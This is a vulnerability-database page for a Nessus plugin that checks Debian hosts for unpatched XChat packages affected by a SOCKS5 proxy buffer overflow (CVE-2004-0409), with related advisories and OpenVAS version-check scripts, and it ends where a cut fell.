Search...

Debian DSA-493-1 : xchat - buffer overflow

2004-09-29T00:00:00

ID DEBIAN_DSA-493.NASL
Type nessus
Reporter This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.
Modified 2004-09-29T00:00:00

Description

A buffer overflow has been discovered in the Socks-5 proxy code of XChat, an IRC client for X similar to AmIRC. This allows an attacker to execute arbitrary code on the users' machine.

                                        
                                            #%NASL_MIN_LEVEL 70300

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Debian Security Advisory DSA-493. The text 
# itself is copyright (C) Software in the Public Interest, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(15330);
  script_version("1.19");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");

  script_cve_id("CVE-2004-0409");
  script_xref(name:"DSA", value:"493");

  script_name(english:"Debian DSA-493-1 : xchat - buffer overflow");
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Debian host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"A buffer overflow has been discovered in the Socks-5 proxy code of
XChat, an IRC client for X similar to AmIRC. This allows an attacker
to execute arbitrary code on the users' machine."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=244184"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.debian.org/security/2004/dsa-493"
  );
  script_set_attribute(
    attribute:"solution", 
    value:
"Upgrade the xchat and related packages.

For the stable distribution (woody) this problem has been fixed in
version 1.8.9-0woody3."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:xchat");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2004/04/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/09/29");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}


include("audit.inc");
include("debian_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;
if (deb_check(release:"3.0", prefix:"xchat", reference:"1.8.9-0woody3")) flag++;
if (deb_check(release:"3.0", prefix:"xchat-common", reference:"1.8.9-0woody3")) flag++;
if (deb_check(release:"3.0", prefix:"xchat-gnome", reference:"1.8.9-0woody3")) flag++;
if (deb_check(release:"3.0", prefix:"xchat-text", reference:"1.8.9-0woody3")) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "DEBIAN_DSA-493.NASL", "bulletinFamily": "scanner", "title": "Debian DSA-493-1 : xchat - buffer overflow", "description": "A buffer overflow has been discovered in the Socks-5 proxy code of\nXChat, an IRC client for X similar to AmIRC. This allows an attacker\nto execute arbitrary code on the users' machine.", "published": "2004-09-29T00:00:00", "modified": "2004-09-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/15330", "reporter": "This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.", "references": ["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=244184", "http://www.debian.org/security/2004/dsa-493"], "cvelist": ["CVE-2004-0409"], "type": "nessus", "lastseen": "2021-01-06T10:02:47", "edition": 25, "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0409"]}, {"type": "gentoo", "idList": ["GLSA-200404-15"]}, {"type": "osvdb", "idList": ["OSVDB:5490"]}, {"type": "redhat", "idList": ["RHSA-2004:585"]}, {"type": "openvas", "idList": ["OPENVAS:53185", "OPENVAS:52474", "OPENVAS:54554"]}, {"type": "nessus", "idList": ["MANDRAKE_MDKSA-2004-036.NASL", "FREEBSD_PKG_8338A20F957311D893660020ED76EF5A.NASL", "FREEBSD_XCHAT_208_2.NASL", "REDHAT-RHSA-2004-585.NASL", "GENTOO_GLSA-200404-15.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:296"]}, {"type": "debian", "idList": ["DEBIAN:DSA-493-1:C476E"]}, {"type": "freebsd", "idList": ["8338A20F-9573-11D8-9366-0020ED76EF5A"]}], "modified": "2021-01-06T10:02:47", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-01-06T10:02:47", "rev": 2}, "vulnersScore": 7.2}, "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-493. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15330);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0409\");\n script_xref(name:\"DSA\", value:\"493\");\n\n script_name(english:\"Debian DSA-493-1 : xchat - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow has been discovered in the Socks-5 proxy code of\nXChat, an IRC client for X similar to AmIRC. This allows an attacker\nto execute arbitrary code on the users' machine.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=244184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-493\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the xchat and related packages.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.8.9-0woody3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xchat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"xchat\", reference:\"1.8.9-0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xchat-common\", reference:\"1.8.9-0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xchat-gnome\", reference:\"1.8.9-0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xchat-text\", reference:\"1.8.9-0woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "pluginID": "15330", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:xchat"], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T11:33:38", "description": "Stack-based buffer overflow in the Socks-5 proxy code for XChat 1.8.0 to 2.0.8, with socks5 traversal enabled, allows remote attackers to execute arbitrary code.", "edition": 3, "cvss3": {}, "published": "2004-06-01T04:00:00", "title": "CVE-2004-0409", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2004-0409"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:xchat:xchat:2.0.0", "cpe:/a:xchat:xchat:1.9.3", "cpe:/a:xchat:xchat:1.9.4", "cpe:/a:xchat:xchat:1.9.1", "cpe:/a:xchat:xchat:2.0.4", "cpe:/a:xchat:xchat:1.9.8", "cpe:/a:xchat:xchat:2.0.1", "cpe:/a:xchat:xchat:1.9.5", "cpe:/a:xchat:xchat:1.8.6", "cpe:/a:xchat:xchat:1.8.9", "cpe:/a:xchat:xchat:1.9.2", "cpe:/a:xchat:xchat:2.0.3", "cpe:/a:xchat:xchat:1.9.7", "cpe:/a:xchat:xchat:1.8.4", "cpe:/a:xchat:xchat:1.8.7", "cpe:/a:xchat:xchat:1.9.0", "cpe:/a:xchat:xchat:2.0.6", "cpe:/a:xchat:xchat:1.8.0", "cpe:/a:xchat:xchat:1.9.9", "cpe:/a:xchat:xchat:2.0.7", "cpe:/a:xchat:xchat:1.8.1", "cpe:/a:xchat:xchat:1.8.3", "cpe:/a:xchat:xchat:2.0.5", "cpe:/a:xchat:xchat:1.9.6", "cpe:/a:xchat:xchat:1.8.5", "cpe:/a:xchat:xchat:2.0.8", "cpe:/a:xchat:xchat:1.8.8", "cpe:/a:xchat:xchat:1.8.2", "cpe:/a:xchat:xchat:2.0.2"], "id": "CVE-2004-0409", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0409", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:xchat:xchat:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.9:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.9:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.8:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.7:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:1.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:xchat:xchat:2.0.2:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:46", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0409"], "edition": 1, "description": "### Background\n\nXChat is a multiplatform IRC client. \n\n### Description\n\nThe SOCKS 5 proxy code in XChat is vulnerable to a remote exploit. Users would have to be using XChat through a SOCKS 5 server, enable SOCKS 5 traversal which is disabled by default and also connect to an attacker's custom proxy server. \n\n### Impact\n\nThis vulnerability may allow an attacker to run arbitrary code within the context of the user ID of the XChat client. \n\n### Workaround\n\nA workaround is not currently known for this issue. All users are advised to upgrade to the latest version of the affected package. \n\n### Resolution\n\nAll XChat users should upgrade to the latest stable version: \n \n \n # emerge sync\n \n # emerge -pv \">=net-irc/xchat-2.0.8-r1\"\n # emerge \">=net-irc/xchat-2.0.8-r1\"\n\nNote that users of the gtk1 version of xchat (1.8.*) should upgrade to xchat-1.8.11-r1: \n \n \n # emerge sync\n \n # emerge -pv \"=net-irc/xchat-1.8.11-r1\"\n # emerge \"=net-irc/xchat-1.8.11-r1\"", "modified": "2006-05-22T00:00:00", "published": "2004-04-19T00:00:00", "id": "GLSA-200404-15", "href": "https://security.gentoo.org/glsa/200404-15", "type": "gentoo", "title": "XChat 2.0.x SOCKS5 Vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:00", "bulletinFamily": "software", "cvelist": ["CVE-2004-0409"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in XChat. The Socks5 proxy section of the product lacks adequate input validation providing an attack vector for a stack overflow. With a specially crafted request, an attacker can elevate permissions resulting in a loss of confidentiality, integrity, and/or availability.\n## Solution Description\nThe vendor has released a patch to address this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Disable use of Socks5 traversal (default off) in product.\n## Short Description\nA remote overflow exists in XChat. The Socks5 proxy section of the product lacks adequate input validation providing an attack vector for a stack overflow. With a specially crafted request, an attacker can elevate permissions resulting in a loss of confidentiality, integrity, and/or availability.\n## References:\nVendor URL: http://www.xchat.org/\nSecurity Tracker: 1009865\n[Secunia Advisory ID:11409](https://secuniaresearch.flexerasoftware.com/advisories/11409/)\nOther Advisory URL: http://mail.nl.linux.org/xchat-announce/2004-04/msg00000.html\n[CVE-2004-0409](https://vulners.com/cve/CVE-2004-0409)\nBugtraq ID: 10168\n", "modified": "2004-04-19T04:27:30", "published": "2004-04-19T04:27:30", "href": "https://vulners.com/osvdb/OSVDB:5490", "id": "OSVDB:5490", "title": "XChat Socks-5 Overflow ", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:27", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0409"], "description": "X-Chat is a graphical IRC chat client for the X Window System.\n\nA stack buffer overflow has been fixed in the SOCKSv5 proxy code.\nAn attacker could create a malicious SOCKSv5 proxy server in such a way\nthat X-Chat would execute arbitrary code if a victim configured X-Chat to\nuse the proxy. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0409 to this issue.\n\nUsers of X-Chat should upgrade to this erratum package, which contains a\nbackported security patch, and is not vulnerable to this issue.", "modified": "2019-03-22T23:43:37", "published": "2004-10-27T04:00:00", "id": "RHSA-2004:585", "href": "https://access.redhat.com/errata/RHSA-2004:585", "type": "redhat", "title": "(RHSA-2004:585) xchat security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:49:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200404-15.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54554", "href": "http://plugins.openvas.org/nasl.php?oid=54554", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200404-15 (xchat)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"XChat is vulnerable to a stack overflow that may allow a remote attacker to\nrun arbitrary code.\";\ntag_solution = \"All XChat users should upgrade to the latest stable version:\n\n # emerge sync\n\n # emerge -pv '>=net-irc/xchat-2.0.8-r1'\n # emerge '>=net-irc/xchat-2.0.8-r1'\n\nNote that users of the gtk1 version of xchat (1.8.*) should upgrade to\nxchat-1.8.11-r1:\n\n # emerge sync\n\n # emerge -pv '=net-irc/xchat-1.8.11-r1'\n # emerge '=net-irc/xchat-1.8.11-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200404-15\nhttp://bugs.gentoo.org/show_bug.cgi?id=46856\nhttp://mail.nl.linux.org/xchat-announce/2004-04/msg00000.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200404-15.\";\n\n \n\nif(description)\n{\n script_id(54554);\n script_cve_id(\"CVE-2004-0409\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200404-15 (xchat)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-irc/xchat\", unaffected: make_list(\"ge 2.0.8-r1\"), vulnerable: make_list(\"lt 2.0.8-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "description": "The remote host is missing an update to xchat\nannounced via advisory DSA 493-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53185", "href": "http://plugins.openvas.org/nasl.php?oid=53185", "type": "openvas", "title": "Debian Security Advisory DSA 493-1 (xchat)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_493_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 493-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow has been discovered in the Socks-5 proxy code of\nXChat, an IRC client for X similar to AmIRC. This allows an attacker\nto execute arbitrary code on the users' machine.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.8.9-0woody3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 2.0.8-1.\n\nWe recommend that you upgrade your xchat and related packages.\";\ntag_summary = \"The remote host is missing an update to xchat\nannounced via advisory DSA 493-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20493-1\";\n\nif(description)\n{\n script_id(53185);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-0409\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 493-1 (xchat)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"xchat-common\", ver:\"1.8.9-0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xchat\", ver:\"1.8.9-0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xchat-gnome\", ver:\"1.8.9-0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xchat-text\", ver:\"1.8.9-0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-10-04T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52474", "href": "http://plugins.openvas.org/nasl.php?oid=52474", "type": "openvas", "title": "FreeBSD Ports: xchat2", "sourceData": "#\n#VID 8338a20f-9573-11d8-9366-0020ed76ef5a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: xchat2\n\nCVE-2004-0409\nStack-based buffer overflow in the Socks-5 proxy code for XChat 1.8.0\nto 2.0.8, with socks5 traversal enabled, allows remote attackers to\nexecute arbitrary code.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://xchat.org/files/source/2.0/patches/xc208-fixsocks5.diff\nhttp://marc.theaimsgroup.com/?l=xchat-announce&m=108114935507357\nhttp://www.vuxml.org/freebsd/8338a20f-9573-11d8-9366-0020ed76ef5a.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52474);\n script_version(\"$Revision: 4203 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-10-04 07:30:30 +0200 (Tue, 04 Oct 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2004-0409\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: xchat2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"xchat2\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8\")>=0 && revcomp(a:bver, b:\"2.0.8_2\")<0) {\n txt += 'Package xchat2 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2016-09-26T17:23:12", "edition": 1, "description": "The following package needs to be updated: xchat2", "published": "2004-07-06T00:00:00", "type": "nessus", "title": "FreeBSD : xchat remotely exploitable buffer overflow (Socks5) (204)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "modified": "2004-07-06T00:00:00", "id": "FREEBSD_XCHAT_208_2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12624", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_8338a20f957311d893660020ed76ef5a.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other 